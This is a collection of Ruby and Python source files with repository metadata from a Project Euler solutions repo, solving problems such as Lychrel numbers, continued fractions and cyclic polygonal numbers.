"/57/sqrt_two.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nlast_exp = 0\ncount = 0\n\n(1..1000).each do |x|\n\tdecimal = Rational(1, (2 + last_exp))\n\tlast_exp = decimal\n\tsqrt_two = 1 + decimal \n\tcount += 1 if sqrt_two.numerator.to_s.size > sqrt_two.denominator.to_s.size\nend\n\np count\n" }, { "alpha_fraction": 0.6159420013427734, "alphanum_fraction": 0.7536231875419617, "avg_line_length": 26.600000381469727, "blob_id": "ae8d92e6f2021d0e804bea66deb7fc215383d7c2", "content_id": "5917c974ee21af401250a7c9ef04d9430dba420e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 83, "num_lines": 5, "path": "/71/proper_fractions.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom fractions import Fraction\n\nprint((Fraction(3, 7) - Fraction(1, 1000000)).limit_denominator(1000000).numerator)\n" }, { "alpha_fraction": 0.5978260636329651, "alphanum_fraction": 0.633152186870575, "avg_line_length": 32.45454406738281, "blob_id": "18fa6a02252d061ecd2baf8e61fbcb96034551c4", "content_id": "c519f947e46cd33a20cc86f8b68a48c0f2345840", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 368, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/42/triangle_words.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nwords = File.new(\"words.txt\").readline.gsub('\"', \"\").split(',')\nvalues = words.map do |word|\n\tword.bytes.map { |b| b - 64 }.reduce(:+)\nend\n\nrequire 'set'\n# Maximum in the words is 192, so generate triangle numbers until 210\ntriangle_numbers = Set.new((1..20).map { |n| (n * (n + 1)) / 2 })\nputs values.select { |v| triangle_numbers.include?(v) }.size\n" }, { "alpha_fraction": 0.48843538761138916, "alphanum_fraction": 0.5687074661254883, "avg_line_length": 20, "blob_id": "c836933508417d2a0025fe360be11fb54bc8e81e", "content_id": "2d978b0729f24b7cd616aca805e674dde6006241", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": 
"no_license", "max_line_length": 57, "num_lines": 35, "path": "/102/triangles.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport fileinput\n\ndef dot(x, y):\n\treturn float(sum([x[i] * y[i] for i in xrange(len(x))]))\n\ndef sub(x, y):\n\treturn [x[i] - y[i] for i in xrange(len(x))]\n\ndef contains_origin(a, b, c):\n\tv0 = sub(a, c)\n\tv1 = sub(a, b)\n\tv2 = a\n\n\tdot00 = dot(v0, v0)\n\tdot01 = dot(v0, v1)\n\tdot02 = dot(v0, v2)\n\tdot11 = dot(v1, v1)\n\tdot12 = dot(v1, v2)\n\n\tinv = 1 / (dot00 * dot11 - dot01 * dot01)\n\tu = (dot11 * dot02 - dot01 * dot12) * inv\n\tv = (dot00 * dot12 - dot01 * dot02) * inv\n\n\treturn (u > 0) and (v > 0) and (u + v < 1)\t\n\ncount = 0\nfor line in fileinput.input(\"triangles.txt\"):\n\tseq = [int(num) for num in line.split(\",\")]\n\ta, b, c = [seq[i:i+2] for i in range(0, 6, 2)]\n\tif contains_origin(a, b, c):\n\t\tcount += 1\t\n\nprint count\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5147929191589355, "avg_line_length": 14.363636016845703, "blob_id": "0184a2d2977300d188d6732017f24248e8668639", "content_id": "30c80e101f83c8b8837d47d1b077f1dd944b7cfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 169, "license_type": "no_license", "max_line_length": 59, "num_lines": 11, "path": "/56/digital_sum.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nmax = 0\n(1..100).each do |a|\n\t(1..100).each do |b|\n\t\tsum =\t(a**b).to_s.split(//).map {|x| x.to_i }.reduce(:+)\t\n\t\tmax = sum if sum > max\n\tend\nend\n\np max\n" }, { "alpha_fraction": 0.5431472063064575, "alphanum_fraction": 0.6294416189193726, "avg_line_length": 15.416666984558105, "blob_id": "e8873f943b896c2f4f679b012512068bacac83b0", "content_id": "583ee325d1b3cb2ca5eafba137d3607207dd84df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 31, "num_lines": 12, "path": "/19/sundays.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport datetime\n\nsundays = 0\n\nfor y in xrange(1901, 2001):\n\tfor m in xrange(1, 13):\n\t\tdate = datetime.date(y, m, 1)\n\t\tif (date.weekday() == 6):\n\t\t\tsundays += 1\n\nprint(sundays)\n" }, { "alpha_fraction": 0.5902140736579895, "alphanum_fraction": 0.6131498217582703, "avg_line_length": 18.81818199157715, "blob_id": "7f2864fedaf99b0489e69931f43479edb133f0dd", "content_id": "3588dc0a8ffa5817001adb1049c1bfe710725e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 50, "num_lines": 33, "path": "/64/continued_fracs_sqrt.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom math import sqrt\n\ndef expand(sq, num, sub):\n\tden = (sq - sub * sub) / num\n\tnext_term = int((sqrt(sq) + sub) / den)\n\tnext_sub = den * next_term - sub\n\treturn (next_term, den, next_sub)\n\ndef continued_fracs(sq):\n\tinitial_guess = int(sqrt(sq))\n\tif (initial_guess ** 2 == sq):\n\t\treturn []\n\t\n\tterm, num, sub = expand(sq, 1, initial_guess) \t\t\t\n \tterms = [term]\n\t\t\n\twhile (True):\n\t\tif (term == initial_guess * 2):\n\t\t\tbreak\n\t\tterm, num, sub = expand(sq, num, sub)\n\t\tterms.append(term)\n\n\treturn terms\n\nodd_period = 0\nlimit = 10001\nfor i in xrange(1, limit):\n\tif (len(continued_fracs(i)) % 2 != 
0):\n\t\todd_period += 1 \n\nprint(odd_period)\n" }, { "alpha_fraction": 0.6010100841522217, "alphanum_fraction": 0.6161616444587708, "avg_line_length": 23.75, "blob_id": "a99d9213cc2ec9534d6e01bd8de889193bc410ec", "content_id": "a7da11ee85c6affc253ad99a166c7acf1c11a7cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 198, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/99/base_exp.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nlines = IO.readlines(File.new(\"base_exp.txt\"))\nlogs = lines.map do |x| \n\tsplit = x.strip.split(\",\").map { |n| n.to_i }\n\tMath.log(split[0]) * split[1]\nend\np logs.index(logs.max) + 1\n" }, { "alpha_fraction": 0.4381271004676819, "alphanum_fraction": 0.6722407937049866, "avg_line_length": 23.91666603088379, "blob_id": "a02d70d816b499b1a5bbeeea80a168193f6642e8", "content_id": "7416398c9c000a2967225c2a8a39abdefd1d0675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 299, "license_type": "no_license", "max_line_length": 63, "num_lines": 12, "path": "/206/unique_square.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nlower = 101010101 # 10203040506070809 ** 0.5\nupper = 138902662 # 19293949596979899 ** 0.5\nregex = /1\\d2\\d3\\d4\\d5\\d6\\d7\\d8\\d9/\n\n# Squares of even numbers are even (and in fact divisible by 4)\nresult = lower.step(upper, 4).find do |x|\n\t(x ** 2).to_s.match(regex)\nend\n\np result * 10\n" }, { "alpha_fraction": 0.5735196471214294, "alphanum_fraction": 0.5934796929359436, "avg_line_length": 16.89285659790039, "blob_id": "53f47ce4318005bf4344c36c7db96de46d007e71", "content_id": "21fb633e0d0fb40830fb3fc4f6af8c23fb2f9009", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1503, "license_type": "no_license", "max_line_length": 88, "num_lines": 84, "path": "/61/cyclic_polygonal.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire 'set'\n\ndef triangle(n)\n\t(n * (n + 1)) / 2\nend\n\ndef square(n)\n\tn ** 2\nend\n\ndef pentagonal(n)\n\t(n * (3 * n - 1)) / 2\nend\n\ndef hexagonal(n)\n\tn * (2 * n -1)\nend\n\ndef heptagonal(n)\n (n * (5 * n - 3)) / 2\nend\n\ndef octagonal(n)\n\tn * (3 * n - 2)\nend\n\ndef all_in_range(n, fn, range = (1000..9999), match = [])\n\tx = send(fn, n)\n\tif x < range.begin\n\t\tall_in_range(n + 1, fn, range, match)\n\telsif x > range.end\n\t\tmatch\n\telse\n\t\tmatch << x\n\t\tall_in_range(n + 1, fn, range, match)\n\tend\nend\n\ndef are_cyclic?(a, b)\n\ta.to_s[0..1] == b.to_s[2..3]\nend\t\n\ndef find_cyclic(nums, cyclic_set, indices)\n\tif indices.empty?\n\t\tif are_cyclic?(cyclic_set.first, cyclic_set.last)\n\t\t\treturn cyclic_set\n\t\telse\n\t\t\treturn nil\n\t\tend\n\telse\n\t\tindices.each do |i|\n\t\t\tto_append = nums[i].find_all { |x| are_cyclic?(x, cyclic_set.last) }\n\t\t\tto_prepend = nums[i].find_all { |x| are_cyclic?(cyclic_set.first, x) }\n\n\t\t\tmap_append = to_append.map do |n|\n\t\t\t\tfind_cyclic(nums, cyclic_set + [n], indices ^ [i])\t\n\t\t\tend\n\t\t\n\t\t\tmap_prepend =\tto_prepend.map do |n|\n\t\t\t\tfind_cyclic(nums, [n] + cyclic_set, indices ^ [i])\t\n\t\t\tend\n\t\t\n\t\t\treturn (map_append + map_prepend).find {|x| !x.nil? 
}\n\t\tend\n\tend\nend\n\nnums = [:triangle, :square, :pentagonal, :hexagonal, :heptagonal, :octagonal].map do |f|\n\tall_in_range(1, f)\nend\n\nindices = Set.new((0..nums.size - 1).to_a)\nindices.each do |i|\n\tstart = nums[i] \n\tstart.each do |t| \n\t\tfound = find_cyclic(nums, [t], indices ^ [i])\n\t\tif !found.nil?\n\t\t\tp found.reduce(:+)\n\t\t\texit\n\t\tend\n\tend\nend\n" }, { "alpha_fraction": 0.588524580001831, "alphanum_fraction": 0.6295081973075867, "avg_line_length": 16.428571701049805, "blob_id": "585184a7bf252546791b19cb7109fd59bf3ed117", "content_id": "7ffd8081ff9dd5be8315623dcef84671bb1da96c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 610, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/26/recurring.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\n#!/usr/bin/ruby\n\nnum_len = 2000\n\ndef shortest_repeating(s)\n\tfound = 0\n\tmax_expected_reoccuring_len = 1000\n\tnum_repeat_tests = 10\n\t(0..max_expected_reoccuring_len).each do |x|\n\t\tfound_reoccurring = (0..num_repeat_tests).all? do |n| \n\t\t\ts[n..(n+x)] == s[(n+x+1)..(n+x+x+1)]\n\t\tend\n\t\t\n\t\tif found_reoccurring\n\t\t\tfound = x + 1\n\t\t\tbreak\n\t\tend\n\tend\n\tfound\nend\n\nmax = 0\nmaxX = 1\n(1..1000).each do |x| \n\tnumerator = Rational(1, x).round(num_len).numerator.to_s\n\tsize = shortest_repeating(numerator)\n\tif (size > max)\n\t\tmax = size\n\t\tmaxX = x\n\tend\nend\n\nputs \"Rational: 1/#{maxX}, Repeating length: #{max}\"\n" }, { "alpha_fraction": 0.5923076868057251, "alphanum_fraction": 0.6256410479545593, "avg_line_length": 19.526315689086914, "blob_id": "57414b49f2aba936be541cd8ec467d3d1a5e48e7", "content_id": "17b8c3810d27930149a432f4055daa2705f985a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 390, "license_type": "no_license", "max_line_length": 80, "num_lines": 19, "path": "/65/e_convergents.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndef terms(x)\n\tt = Array.new(x - 1, 1)\n\t1.step(x - 1, 3).each_with_index do |i, index|\n\t\tt[i] = (index + 1) * 2 unless t[i].nil?\n\tend\t\n\t([2] + t).reverse\nend\n\ndef continued_fraction(terms)\n\tif (terms.size == 1)\n\t\tterms.pop\t\n\telse\n\t\tterms.pop + Rational(1, continued_fraction(terms))\n\tend\nend\n\np continued_fraction(terms(100)).numerator.to_s.split(//).map(&:to_i).reduce(:+)\n" }, { "alpha_fraction": 0.29347825050354004, "alphanum_fraction": 0.3913043439388275, "avg_line_length": 17.399999618530273, "blob_id": "4c379570444469ee0afc250e9c1f40561e27c5a7", "content_id": "4c1757fdc6c9237c262c528263e5473cbd3e9da1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 92, "license_type": "no_license", "max_line_length": 61, "num_lines": 5, "path": "/1/sum.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\na = 0\n(1..999).each { |x| a += x if (x % 3 == 0) || (x % 5 == 0) } \nputs a\n" }, { "alpha_fraction": 0.6528028845787048, "alphanum_fraction": 0.6799276471138, "avg_line_length": 22.04166603088379, "blob_id": "41031b9aefeb7e5a4503e29abedc8d87af281855", "content_id": "5ff28c8d509954147853ddd0b60663ff5a740da6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/92/square_digits_chain.py", 
"repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ndef next_term(s):\n \treturn reduce(lambda x, y: int(x) + int(y) ** 2, s, \"0\")\n\ndef chain(start, known_arrivals, accum):\n\taccum.add(start)\n\tterm = next_term(str(start))\n\tif term in accum:\n\t\treturn None\n\telif term in known_arrivals:\n\t\treturn accum\t\n\telse:\n\t\treturn chain(term, known_arrivals, accum)\n\nknown_arrivals = set([89])\nfor i in xrange(1, 10000000):\n\tif i not in known_arrivals:\n\t\tchained = chain(i, known_arrivals, set([]))\n\t\tif chained != None:\n\t\t\tknown_arrivals |= chained\n\nprint(known_arrivals)\nprint(len(known_arrivals))\n" }, { "alpha_fraction": 0.49473685026168823, "alphanum_fraction": 0.5508772134780884, "avg_line_length": 12.571428298950195, "blob_id": "03744e5f518cae6bf762fad6addcad95709691d9", "content_id": "0ed4e3cf7e35dbaa32f9743ba915c906ba1fb49a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 285, "license_type": "no_license", "max_line_length": 40, "num_lines": 21, "path": "/47/distinct_prime_factors.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndef factors(x)\n\t`factor #{x} | cut -d: -f2`.split.uniq\nend\n\nNEXT_N = 4\n\n(125000..150000).each do |x|\n\tif factors(x).size == NEXT_N\n\t\tnext_n = (1..(NEXT_N - 1)).all? do |n|\n\t\t\ty = x + n\t\n\t\t\tfactors(y).size == NEXT_N\n\t\tend\n\n\t\tif next_n\n\t\t\tputs x\n\t\t\tbreak\n\t\tend\n\tend\nend\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 14.119999885559082, "blob_id": "5c7766b0fd1f77cb0ab89c54e08e283f895660d8", "content_id": "8cf772a41ffaf437a8b9bbab1e65fa08c12d7da1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "no_license", "max_line_length": 29, "num_lines": 25, "path": "/55/lychrel.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ndef transform(x):\n\treturn int(str(x)[::-1]) + x\n\ndef is_palindrome(x):\n\tx_str = str(x)\n\treturn x_str == x_str[::-1]\n\ndef is_lychrel(x):\n\tpal = transform(x)\n\tfor i in xrange(0, 50):\n\t\tif (is_palindrome(pal)):\n\t\t\treturn False\n\t\telse:\n\t\t\tpal = transform(pal)\n\n\treturn True\n\ncount = 0\nfor i in xrange(1, 10000):\n\tif (is_lychrel(i)):\n\t\tcount += 1\n\nprint(count)\n" }, { "alpha_fraction": 0.356589138507843, "alphanum_fraction": 0.4961240291595459, "avg_line_length": 8.923076629638672, "blob_id": "80f52c75fb416548f0efe3eb89758ff3b8c7fa36", "content_id": "cb655291f872c88766c0dc4c6f2e9347e8c4bc61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 28, "num_lines": 13, "path": "/25/fibonacci.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nf1 = 1\nf2 = 1\nfn = 2\nn = 3\nwhile (len(str(fn)) < 1000):\n\tf1 = f2\n\tf2 = fn\n\tfn = f1 + f2 \n\tn += 1\n\nprint(n)\n" }, { "alpha_fraction": 0.5517241358757019, "alphanum_fraction": 0.6068965792655945, "avg_line_length": 10.15384578704834, "blob_id": "ce9a04a383087bce688c89e39734f26ebecc6652", "content_id": "8c28aca82c0dd680b9124b05d87b7dcc29bffed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 145, "license_type": "no_license", "max_line_length": 21, "num_lines": 13, "path": "/29/distinct.rb", "repo_name": 
"racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire 'set'\n\ndistinct = Set.new\n\n(2..100).each do |a|\n\t(2..100).each do |b|\n\t\tdistinct << a ** b\n\tend\nend\n\nputs distinct.size\n" }, { "alpha_fraction": 0.6150793433189392, "alphanum_fraction": 0.6517857313156128, "avg_line_length": 27, "blob_id": "08c8d024ac1d113ac49b791810b4dc425133b097", "content_id": "5b7a0638362122d0a83699eb7135e05a61923ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1008, "license_type": "no_license", "max_line_length": 132, "num_lines": 36, "path": "/43/substring_pandigital.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ndef unique_digits(s):\n\treturn len(set(s)) == len(s)\n\ndef digit_substrs(start, end, step):\n\tunfiltered = [\"%03d\" % i for i in range(start, end, step)]\n\treturn [i for i in unfiltered if unique_digits(i)]\n\ndef flatten(it):\n\tfor e in it:\n\t\tif isinstance(e, list):\n\t\t\tfor f in flatten(e):\n\t\t\t\tyield f\n\t\telse:\n\t\t\tyield e\n\ndiv_by = [2, 3, 5, 7, 11, 13, 17]\nsubstrs = [digit_substrs(0, 999, i) for i in div_by]\n\ndef find_pandigitals(x, col_num, pandigital):\n\tif col_num == 0:\n\t\treturn pandigital\n\n\tnext_col = col_num - 1\n\treturn [find_pandigitals(i, next_col, i[0] + pandigital) for i in substrs[next_col] if i[1:3] == x[0:2] and i[0] not in pandigital]\n\nlast_col = len(div_by) - 1 \nmissing_last_digit = [i for i in flatten([find_pandigitals(i, last_col, i) for i in substrs[last_col]])]\n\ndigits = set(\"1234567890\")\ndef find_last_digit(x):\n\treturn (digits - set(x)).pop() \n\npandigitals = [int(find_last_digit(i) + i) for i in missing_last_digit]\nprint(reduce(lambda x, y: x + y, pandigitals))\n" } ]
52
akhildudhe/Python_WebScrapper_With_Elastic_Search
https://github.com/akhildudhe/Python_WebScrapper_With_Elastic_Search
848073cb6608037feeebe79af19d6e687f8246b0
dad0adb13ce0ec7fd2282e5971a5b961c66394f9
0aeb59e86ebe29d4fb70c3a034d5b2f081908cf3
refs/heads/master
2022-07-12T19:57:49.122543
2020-05-17T09:20:06
2020-05-17T09:20:06
264,503,198
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4094972014427185, "alphanum_fraction": 0.41438546776771545, "avg_line_length": 36.093265533447266, "blob_id": "df451f0699e9fc7b4bbca0f3e6b8b41e6b78fa2d", "content_id": "a86cc76efff479ade58f42faaa279a44cd4255f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7160, "license_type": "permissive", "max_line_length": 321, "num_lines": 193, "path": "/ScrapperProject.py", "repo_name": "akhildudhe/Python_WebScrapper_With_Elastic_Search", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Importing Necessary Libraries\nfrom bs4 import BeautifulSoup as soup\nimport requests\nimport lxml\nimport re\nimport pandas as pd\nfrom threading import Thread\nfrom elasticsearch import Elasticsearch\n\nif __name__== \"__main__\":\n main_url='https://en.wikipedia.org/wiki/List_of_universities_in_England'\n source=requests.get(my_url).text\n page_soup=soup(source,'lxml')\n containers=page_soup.find('div',{'class':\"mw-parser-output\"})\n rows= containers.table.find_all('tr') \n data=[]\n header_name=[]\n x=0\n type_name=re.split('https://en.wikipedia.org/wiki/',my_url)[1]\n # csv_file=open(csv_name[1],'w')\n\n for row in rows:\n x+=1\n if x==1:\n header=row.find_all('th')\n for hedr in header:\n header_name.append(hedr.text[0:-1])\n header_name.append('Url')\n data.append(header_name)\n else:\n cols = row.find_all('td')\n link='https://en.wikipedia.org'+cols[0].a.get('href')\n cols = [ele.text.strip() for ele in cols]\n cols.append(link)\n data.append([ele for ele in cols if ele])\n\n df = pd.DataFrame.from_records(data[1:], columns=data[0])\n urls=list(df['Url'])\n sub_agg_df = pd.DataFrame(columns=['University','Former names','Detailed_Location','Students','Undergraduates','Postgraduates','Url'])\n print(sub_agg_df)\n\n # defining the function for scraping individual website \n def sub_scrapping(url,indx,U_name):\n print(url,indx)\n my_url=url\n try:\n print('Executing for '+my_url)\n source=requests.get(my_url).text\n page_soup=soup(source,'lxml')\n containers=page_soup.find('table',{'class':\"infobox vcard\"})\n indivual_data={}\n sub_headers=['Former names','Location','Students','Undergraduates','Postgraduates']\n\n for sh in range(1,6):\n sub_container=containers.find_all('tr')\n for ele in sub_container:\n try:\n if ele.th.text==sub_headers[sh-1]:\n indivual_data.update({sub_headers[sh-1]:ele.td.text})\n except:\n pass\n if len(indivual_data) < sh:\n indivual_data.update({sub_headers[sh-1]:None})\n\n\n df_sub=pd.DataFrame([[U_name,indivual_data['Former names'],str(indivual_data['Location']),indivual_data['Students'],indivual_data['Undergraduates'],indivual_data['Postgraduates'],my_url]],columns=['University','Former names','Detailed_Location','Students','Undergraduates','Postgraduates','Url'],index=[indx])\n global sub_agg_df\n sub_agg_df=sub_agg_df.append(df_sub)\n except:\n print('Error in fetching url '+my_url)\n\n threadlist=[]\n for x in df.itertuples():\n td= Thread(target=sub_scrapping,args=(x.Url,x.Index,x.University))\n td.start()\n threadlist.append(td)\n for b in threadlist:\n b.join()\n df.drop('Url', axis=1, inplace=True)\n final_df=pd.merge(sub_agg_df, df, on='University')\n # Optional: Saving the table in CSV format for analysis purspose in excel:\n final_df.to_csv(type_name+'.csv')\n es= Elasticsearch('http://localhost:9200')\n es.indices.delete(index='universities')\n\n # {\n # \"settings\":{\n # \"analysis\":{\n # \"analyzer\":{\n # \"my_analyzer\":{\n # 
\"type\":\"keyword\",\n # }\n # }\n # }\n # }\n\n # \"mappings\":{\n # \"doc\":{\n # \"dynamic\": \"strict\",\n # \"properties\":{\n # \"University\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Former names\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Detailed_Location\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Students\":{\n # \"type\":\"integer\"\n # },\n # \"Undergraduates\":{\n # \"type\":\"integer\"\n # },\n # \"Postgraduates\":{\n # \"type\":\"integer\"\n # },\n # \"Url\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Location\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # },\n # \"Established\":{\n # \"type\":\"integer\"\n # },\n # \"Number of students\":{\n # \"type\":\"integer\"\n # },\n # \"Tuition fee\":{\n # \"type\":\"integer\"\n # },\n # \"Degree powers\":{\n # \"type\":\"text\",\n # \"fields\":{\n # \"keyword\":{\n # \"type\":\"keyword\"\n # }\n # },\n # \"analyzer\":\"my_analyzer\"\n # }\n # }\n # }\n # }\n # }\n es.indices.create(index='universities',ignore=400)\n for x in final_df.iterrows():\n es.index(index='universities',doc_type=type_name,id=x[0] ,body=dict(x[1]))\n print('!!!!!!!!----Data Transfer Completed-----!!!!!!!')\n\n es= Elasticsearch('http://localhost:9200')\n res=es.search(index='universities',body={\"from\":0, \"size\":1,\"query\":{\"match\":{\"University\":\"Harper Adams University\"}}})\n res \n # Execting queries\n res=es.search(index=\"universities\",body={\"from\":0, \"size\":2, \"query\":{\"bool\":{\"must\":{\"match\":{\"University\":\"Harper Adams University\"}},\"must\":{\"match\":{\"Former names\":\"None\"}}}}}) \n res\n\n" }, { "alpha_fraction": 0.6131661534309387, "alphanum_fraction": 0.6156739592552185, "avg_line_length": 52.16666793823242, "blob_id": "ba70e6effbb4269ae1c44a068bfc348e9e953d09", "content_id": "3a80a7339adcea9e2108035c55e342acda870db9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1595, "license_type": "permissive", "max_line_length": 198, "num_lines": 30, "path": "/README.md", "repo_name": "akhildudhe/Python_WebScrapper_With_Elastic_Search", "src_encoding": "UTF-8", "text": "\n# Multiple Sub-iterable Webscrapping with Threading and Elastic Search.\n## Near-Production ready code.\n - Akhil Dudhe\n\n-----------------------------\n### Objectives of this project to build Data pipline for iterable webscrapping with the help of scalable solutions around. The project focus on following:\n1. Offers python solution for Webscrapping with Multi-Threading to achive parallelism. \n2. 
Offering fast query solution using Elastic Search.\n-----------------------------\n### Problem Statement : Building a repository of universities of a particular country.\n### Problem Assumption : Country selected as <a href=\"https://en.wikipedia.org/wiki/List_of_universities_in_England\">United Kingdom</a>.\n-----------------------------\n### Setup Requirement to Run <a href=\"https://github.com/akhildudhe/Python_WebScrapper_With_Elastic_Search/blob/master/ScrapperProject.ipynb\">ScrapperProject.ipynb</a> file\n\n<ol type=\"number\">\n <li> 3.7 Python version <a href=\"https://www.anaconda.com/products/individual\">Jupyter Notebook</a> with following libraries installed using \"pip install library_name\" command in conda teminal.\n <ul>\n <li>BeautifulSoup</li>\n <li>requests</li>\n <li>lxml</li>\n <li>threading</li>\n <li>elasticsearch</li>\n </ul>\n </li>\n <li><a href=\"https://www.elastic.co/downloads/elasticsearch\">Elastic Search Server</a></li>\n</ol>\n\n------------------------------------\n\nLicensed under the [MIT License](LICENSE)" } ]
2
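A minimal sketch of the thread-per-URL fan-out pattern that `ScrapperProject.py` above applies in `sub_scrapping` (one `Thread` per university page, all joined before results are merged). The URLs and the work done per page here are invented placeholders, not taken from the repository, and the lock is an addition: the original appends to a shared DataFrame from several threads, a read-modify-write that is safer behind a lock.

```python
import threading
import urllib.request

results = []
lock = threading.Lock()  # guards the shared results list across threads

def fetch(url):
    # Placeholder worker: download a page and record its size.
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            body = resp.read()
        with lock:  # mutate the shared list only while holding the lock
            results.append((url, len(body)))
    except OSError as err:
        print("Error fetching", url, "-", err)

urls = ["https://example.com", "https://example.org"]  # hypothetical inputs
threads = [threading.Thread(target=fetch, args=(u,)) for u in urls]
for t in threads:
    t.start()
for t in threads:
    t.join()  # wait for every worker, as the scraper does, before merging
print(results)
```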
apparentlymart/failinator
https://github.com/apparentlymart/failinator
5e5eab0c6558e118a105b8731bd2c8c0bf408beb
c828567d545b3c76fbca5c93a9861e2c39bc58e2
f13cace24165f093f44a8ce4d7c5a9945e36a15e
refs/heads/master
2023-07-08T17:44:56.776524
2016-05-30T21:38:31
2016-05-30T21:38:31
43,111,391
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.7200772166252136, "avg_line_length": 29.41176414489746, "blob_id": "d80fcec53ad7285cb77d4d0844ba1f32db073686", "content_id": "ae498360732e5d0504281eaeeb69d6a50b74352a", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 518, "license_type": "no_license", "max_line_length": 72, "num_lines": 17, "path": "/fabfile.py", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nfrom fabric.api import env\nfrom fabric.operations import sudo, run\nfrom fabric.contrib.project import rsync_project\n\n\nenv.hosts = ['[email protected]']\nenv.key_filename = 'provisioning_private_key'\n\n\ndef deploy():\n # make sure the directory is there!\n sudo('mkdir -p /opt/failinator')\n\n # upload files in the current dir to the remote dir\n rsync_project(remote_dir='/opt/failinator', local_dir='./')\n\n run('cd /opt/failinator/server; SERVER_PORT=3000 npm start')\n" }, { "alpha_fraction": 0.6314184069633484, "alphanum_fraction": 0.6449754238128662, "avg_line_length": 16.458580017089844, "blob_id": "b748c26381ac9109dc897404eb9d273fcb38412d", "content_id": "0a6124a74d440b18454675e15735ec33f230dcc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 5901, "license_type": 